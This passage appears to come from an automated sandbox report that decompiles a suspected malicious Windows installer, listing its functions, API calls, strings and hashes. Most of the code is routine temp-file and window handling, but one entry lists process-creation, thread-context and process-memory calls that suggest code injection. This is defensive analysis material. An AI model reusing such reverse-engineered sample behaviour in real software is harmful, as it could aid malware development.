					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                              0x004015d5
                                                                              0x004015dc
                                                                              0x004015e6
                                                                              0x004015e8
                                                                              0x004015ee
                                                                              0x004015f6
                                                                              0x004015fc
                                                                              0x004015fe
                                                                              0x00401601
                                                                              0x00401609
                                                                              0x00401616
                                                                              0x00401623
                                                                              0x00401623
                                                                              0x00401618
                                                                              0x00401619
                                                                              0x00401621
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401621
                                                                              0x00401616
                                                                              0x00401626
                                                                              0x00401629
                                                                              0x0040162b
                                                                              0x0040162c
                                                                              0x004015ee
                                                                              0x00401633
                                                                              0x00401653
                                                                              0x004021e8
                                                                              0x00401635
                                                                              0x00401637
                                                                              0x00401642
                                                                              0x00401648
                                                                              0x00401648
                                                                              0x00402932
                                                                              0x0040293e

                                                                              APIs
                                                                                • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040556D
                                                                                • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                                • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                              • API String ID: 3751793516-501415292
                                                                              • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                              • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                              • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                              • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                              0x004056c3
                                                                              0x004056c9
                                                                              0x004056ca
                                                                              0x004056ca
                                                                              0x004056cb
                                                                              0x004056d2
                                                                              0x004056dc
                                                                              0x004056e9
                                                                              0x004056ec
                                                                              0x004056f4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004056f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004056fa
                                                                              0x00000000
                                                                              0x004056fa
                                                                              0x00000000

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 004056D2
                                                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                              Strings
                                                                              • nsa, xrefs: 004056CB
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                              • API String ID: 1716503409-1609819632
                                                                              • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                              • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                              • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                              • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02630034, Relevance: 6.5, APIs: 4, Instructions: 546processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 0263035F
                                                                              • GetThreadContext.KERNELBASE(?,00010007), ref: 02630382
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 026303A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThread
                                                                              • String ID:
                                                                              • API String ID: 2411489757-0
                                                                              • Opcode ID: c44179bce8967b620d459be839f7a9e3c0b25be658a09367740f45050a05de83
                                                                              • Instruction ID: b070f9770eba08d8261b5adf0f1dcc9ca42abdaf61ed3ae0f6373374b20f257c
                                                                              • Opcode Fuzzy Hash: c44179bce8967b620d459be839f7a9e3c0b25be658a09367740f45050a05de83
                                                                              • Instruction Fuzzy Hash: E6222571E40218EFEB25CBA4DC45BEDB7B5BF49704F20409AE618FA2A0D7709A94CF15
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












                                                                              0x0040136e
                                                                              0x004013fb
                                                                              0x00401382
                                                                              0x00401384
                                                                              0x00401387
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401389
                                                                              0x0040138a
                                                                              0x0040138f
                                                                              0x00401394
                                                                              0x00000000
                                                                              0x00401409
                                                                              0x00401396
                                                                              0x00401398
                                                                              0x004013a6
                                                                              0x004013ab
                                                                              0x004013ab
                                                                              0x004013ad
                                                                              0x004013b5
                                                                              0x004013b6
                                                                              0x004013b8
                                                                              0x004013ba
                                                                              0x004013ba
                                                                              0x004013af
                                                                              0x004013b1
                                                                              0x004013b2
                                                                              0x004013b2
                                                                              0x004013bc
                                                                              0x004013c1
                                                                              0x004013c3
                                                                              0x004013c9
                                                                              0x004013d2
                                                                              0x004013d7
                                                                              0x004013d7
                                                                              0x004013f5
                                                                              0x004013f5
                                                                              0x004013c1
                                                                              0x00000000

                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                              • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: 4@
                                                                              • API String ID: 3850602802-2385517874
                                                                              • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                              • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                                                              • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                                                              • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                              0x00403117
                                                                              0x0040311d
                                                                              0x00403123
                                                                              0x0040312a
                                                                              0x0040312f
                                                                              0x00403137
                                                                              0x00403143
                                                                              0x00403149
                                                                              0x0040312d
                                                                              0x0040312d
                                                                              0x0040312d

                                                                              APIs
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                                • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                              • String ID: "C:\Users\user\Desktop\NdBLyH2h5d.exe" $C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 4115351271-3357198990
                                                                              • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                              • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                                                              • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                              • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                              0x00405694
                                                                              0x004056a1
                                                                              0x004056b6
                                                                              0x004056bc

                                                                              APIs
                                                                              • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                              • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                              • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                              • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                              0x004030d1
                                                                              0x004030e4
                                                                              0x004030ec
                                                                              0x00000000
                                                                              0x004030f3
                                                                              0x00000000
                                                                              0x004030f5

                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                              • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                              • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                              • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                                              0x0040310d
                                                                              0x00403113

                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                              • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                              • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                              • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































                                                                              0x00404ea9
                                                                              0x00404eaf
                                                                              0x00404eb8
                                                                              0x00404ebb
                                                                              0x00405048
                                                                              0x0040506c
                                                                              0x0040506c
                                                                              0x0040507f
